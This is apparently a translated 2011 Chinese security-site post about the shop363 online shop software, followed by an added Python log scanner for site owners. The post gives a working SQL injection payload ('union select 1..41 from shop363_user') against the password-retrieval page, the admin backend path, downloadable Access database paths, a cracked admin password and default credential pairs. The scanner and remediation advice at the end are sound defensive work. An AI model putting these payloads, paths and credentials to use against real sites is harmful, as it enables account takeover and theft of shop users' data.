shop363 online shop program: a truly universal vulnerability - Vulnerability Warning - Black Bar Safety Net

2011-10-21T00:00:00
ID MYHACK58:62201132102
Type myhack58
Reporter Anonymous
Modified 2011-10-21T00:00:00

Description

This application's security is not very good, but one of its replace() functions is well written. I did not find out how it is written, but injection strings such as space, select, %20, a+number, /**/, etc. are filtered to empty. Working out the statements for the vulnerability in the search function is a lot of trouble, so I will not write them out. Instead, here is a more drastic method that gets the account password directly and quickly.

Keywords: technical support: shop363.net

Admin backend address: /admin_shop363/

Database: Data_Shop363/Date_Shop363_shop.mdb

Database decryption tool: AccessUnLock.exe

Cracked account: admin password: actionshop363?

Backup database: Data_Shop363/Date_Shop363_shop.mdb (the default database)

Forum database: bbs/data/#sjyshop363.mdb

The injection vulnerability in the home page's password-retrieval function is not much use for getting a shell, but it can expose some usernames and passwords directly:

‘union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from shop363_user

The position displayed on the page is 7.

Replace it in turn with username and password.

You can also use the backend default passwords: action first

Second group: admin admin888

Third group: admin admin (90% of the time these get directly into the backend)
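Site owners can look for the activity described above in their web server logs. The following is an added example, not part of the original post: it flags requests for .mdb files, union select in decoded query strings, and access to /admin_shop363/ by a client that probed earlier. The log layout, the sample lines and the file names login.asp and getpass.asp are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Indicators come from the write-up above; the log layout is an assumption.
MDB = re.compile(r"\.mdb(?:$|\?)")
UNION = re.compile(r"\bunion\s+select\b")
ADMIN_PREFIX = "/admin_shop363/"

# Constructed sample lines: "client_ip method url status"
# login.asp and getpass.asp are hypothetical file names.
SAMPLE_LOG = """\
203.0.113.7 GET /Data_Shop363/Date_Shop363_shop.mdb 200
203.0.113.7 GET /bbs/data/%23sjyshop363.mdb 404
203.0.113.7 POST /admin_shop363/login.asp 302
198.51.100.4 GET /getpass.asp?user=x%27+UNION/**/SELECT+1,2+from+shop363_user 200
192.0.2.10 POST /admin_shop363/login.asp 302
192.0.2.10 GET /index.asp?id=12 200
"""

def normalize(url):
    """URL-decode, lowercase, and treat SQL comments as whitespace."""
    text = unquote_plus(url).lower()
    return re.sub(r"/\*.*?\*/", " ", text)

def scan(log_text):
    """Return {client_ip: [findings in the order seen]} for flagged clients."""
    findings = {}
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip lines that do not fit the assumed layout
        ip, _method, url, status = parts
        url = normalize(url)
        hits = []
        if MDB.search(url):
            # A 200 means the Access file itself was handed to the client.
            hits.append("mdb-served" if status == "200" else "mdb-probe")
        if UNION.search(url):
            hits.append("union-select")
        if url.startswith(ADMIN_PREFIX) and ip in findings:
            hits.append("admin-after-probe")
        if hits:
            findings.setdefault(ip, []).extend(hits)
    return findings

if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG).items():
        print(client, hits)
```

An mdb-served finding means the database should be treated as disclosed: move the .mdb files out of the web root and change the admin passwords, including any defaults.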

From: tools, sniff3r